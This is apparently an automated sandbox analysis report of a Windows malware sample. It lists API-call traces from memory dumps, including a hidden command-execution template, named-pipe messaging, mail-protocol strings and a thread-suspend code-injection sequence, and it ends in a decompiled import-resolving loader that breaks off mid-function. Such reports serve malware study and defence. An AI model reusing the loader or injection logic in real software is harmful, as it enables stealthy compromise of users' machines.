    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 8
  • API ID: CreateProcessGetExitCodeProcessGetLastErrorWaitForMultipleObjectslstrlenmemsetwcstombs
  • String ID: D$cmd /C "%s> %s1"
  • API String ID: 1537746708-2226621151
  • Opcode ID: 8f43a44b104833d0f96806934345d3a8753fb5f9a1b6580f8a9b41b9e07b006e
  • Instruction ID: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
  • Opcode Fuzzy Hash: 3EF0C02508CBD197D4C33468270174BEA16AF211D2C4D6B91A6806A1885F0075D2575B
  • Instruction Fuzzy Hash: 189f0c3c70cc7b6004f2ba7acf1b9f38675443b636e617586de16067a78319dd
APIs
  • memset.NTDLL ref: 001C743A
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
  • wcstombs.NTDLL ref: 001C747D
  • CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
  • GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
  • GetLastError.KERNEL32 ref: 001C7507
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80)); // _a4 = IMAGE_NT_HEADERS; +0x80 = DataDirectory[IMPORT].VirtualAddress
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi; // __edi = image base, so _t34 = first IMAGE_IMPORT_DESCRIPTOR
				_t23 =  *((intOrPtr*)(_t34 + 0xc)); // descriptor.Name: RVA of the DLL name string
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // load the DLL named in the descriptor
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44)); // then zero the DLL name inside the image
					_t27 =  *_t34; // descriptor.OriginalFirstThunk (import lookup table)
					_t35 =  *((intOrPtr*)(_t34 + 0x10)); // descriptor.FirstThunk (the IAT that gets patched)
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20)); // Name field of the next descriptor (0x14 + 0xc)
							_t34 = _t34 + 0x14; // sizeof(IMAGE_IMPORT_DESCRIPTOR); a zero Name ends the list
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) { // sign bit set: IMAGE_ORDINAL_FLAG32, import by ordinal
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) { // +0x50 = OptionalHeader.SizeOfImage
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
